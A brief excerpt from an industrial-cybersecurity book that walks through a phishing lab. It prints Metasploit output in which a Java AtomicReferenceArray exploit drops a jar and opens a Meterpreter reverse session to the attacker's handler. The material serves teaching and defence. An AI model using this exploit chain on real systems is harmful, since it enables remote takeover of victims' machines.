What can the attacker do with their access?

After Mark clicks on the link in the email, we send him the following messages, which appear in the Metasploit handler screen on the Kali Linux VM:

msf exploit(java_atomicreferencearray) > [*] 122.10.10.10     java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability[*] 122.10.10.10     java_atomicreferencearray - Generated jar to drop (5122 bytes).[*] 122.10.10.10     java_atomicreferencearray - Sending jar[*] 122.10.10.10     java_atomicreferencearray - Sending jar[*] Sending stage (49645 bytes) to 122.10.10.10[*] Meterpreter session 2 opened (122.10.10.222:4444 -> 122.10.10.10:25554) at 2017-06-04 09:20:37 -0400

What is shown here is the establishment of a Meterpreter session ...

Get Industrial Cybersecurity now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.